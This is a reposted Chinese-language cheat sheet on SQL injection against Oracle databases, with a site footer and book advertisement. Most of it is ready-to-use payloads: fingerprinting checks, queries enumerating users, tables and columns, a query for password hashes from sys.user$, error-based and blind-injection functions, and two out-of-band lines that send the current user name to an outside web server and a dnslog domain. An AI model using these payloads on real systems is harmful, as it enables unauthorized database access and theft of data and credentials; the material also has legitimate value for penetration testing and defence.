SQL注入小结(Oracle)

内容简介：decode(条件，值1，值1结果，值2，值2结果，。。。值n，值n结果，默认值)条件和那个值相等就返回那个值的结果instr(字符串，子串)

0x00 判断数据库类型

Oracle有一些自带的表：dual、user_tables

id=45 and (select count(*) from user_tables)>0--
id=45 and (select count(*) from dual)>0--

利用自带的一些函数：譬如utl_http.request 这些
利用Oracle的字符连接符：CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(49)||CHR(61)||CHR(49)

0x01 基本信息获取

查看sid
```
select instance_name from v$instance;
```

查看数据库版本：

select banner from v$version where rownum=1;
select banner from sys.v_$version where rownum=1;

查看用户：

select user from dual; --当前用户
select username from user_users; --当前用户
select username from all_users; --查看所有用户
select username from dba_users; --查看所有用户(需要有权限)

查看当前用户角色：
```
select role from session_roles;
```

查看数据库用户名和密码：

select name, password, astatus from sys.user$; --需要权限

通过注入获取数据

--列database
select global_name from global_name;
select sys.database_name from dual;
select name from v$database;
select instance_name from v$instance;
--列owner
select distinct owner from all_tables;
--列owner的tables
select table_name from all_tables where owner='UTEST';
--列tables的columns
select column_name from all_tab_columns where table_name='TUSER';
select column_name from all_tab_cols where table_name='TUSER';


--列tablespace
select tablespace_name from user_tablespaces;
--列tablespace的tables
select table_name from user_tables where tablespace_name='DB_TEST_DATA';
--列tables的columns
select column_name from user_tab_columns where table_name='TUSER';

0x02 UNION query注入

存在注入
判断列数
尝试union select 依次判断字段类型(下图判断出第二个字段是字符型)
得到表名
得到表的个数得到第一个表的表名得到第二个表的表名
得到第一个表的字段
得到第一个表的数据

0x03 error-based注入

ctxsys.drithsx.sn
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
utl_inaddr.get_host_name(在11g以后需要是超级用户或已授予网络访问权限的用户才能使用)

0x04 boolean-based blind注入

decode

decode(条件，值1，值1结果，值2，值2结果，。。。值n，值n结果，默认值)

条件和那个值相等就返回那个值的结果 SQL注入小结(Oracle)

instr

instr(字符串，子串)

从一个字符串中查找指定子串的位置，这里一直将位置置为1 SQL注入小结(Oracle)

0x05 无回显注入

web服务接收结果

select * from utest.msg where id=2 and 1=utl_http.request('http://59.108.35.198:8888/'||(select user from dual));

dns服务接收结果

select * from utest.msg where id=2 and (select utl_inaddr.get_host_address((select user from dual)||'.dnslog.wyb0.com') from dual) is not null;

Reference(侵删)：

以上所述就是小编给大家介绍的《SQL注入小结(Oracle)》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对码农网的支持！

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

失控的未来

[美]约翰·C·黑文斯 / 仝琳 / 中信出版集团 / 2017-4-1 / 59.00元

【编辑推荐】 20年前，尼古拉•尼葛洛庞帝的《数字化生存》描绘了数字科技给人们的工作、生活、教育和娱乐带来的冲击和各种值得思考的问题。数字化生存是一种社会生存状态，即以数字化形式显现的存在状态。20年后，本书以一种畅想的形式，展望了未来智能机器人与人类工作、生活紧密相联的场景。作者尤其对智能机器人与人类的关系，通过假设的场景进行了大胆有趣的描述，提出了人工智能的未来可能会面临的一些问题。黑文......一起来看看《失控的未来》这本书的介绍吧!

码农工具